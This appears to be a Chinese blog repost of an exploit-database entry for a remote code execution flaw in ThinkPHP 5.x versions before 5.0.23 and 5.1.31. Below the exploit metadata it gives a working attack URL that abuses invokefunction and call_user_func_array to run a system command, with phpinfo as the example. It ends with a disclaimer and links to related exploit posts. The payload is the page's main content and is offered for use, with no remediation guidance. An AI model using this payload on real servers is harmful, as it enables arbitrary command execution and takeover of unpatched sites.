[EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

本文转载自查看原文 2019-03-14 21:36 588 GetShell/ 代码执行/ exploit

# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A

# Exploit

http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞 CTF-攻防世界-web-php_rce(ThinkPHP5.x < 5.1.31, <= 5.0.23) CVE-2019-0227: Remote Code Execution in Apache Axis [ThinkPHP]5.0.23-Rce thinkPHP 5.0.23远程代码执行漏洞 phpMyadmin /scripts/setup.php Remote Code Injection && Execution CVE-2009-1151 [ThinkPHP]5.0.23-Rce 漏洞复现 thinkphp中的exp查询 ThinkPHP-5.0.23新的RCE漏洞测试和POC ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用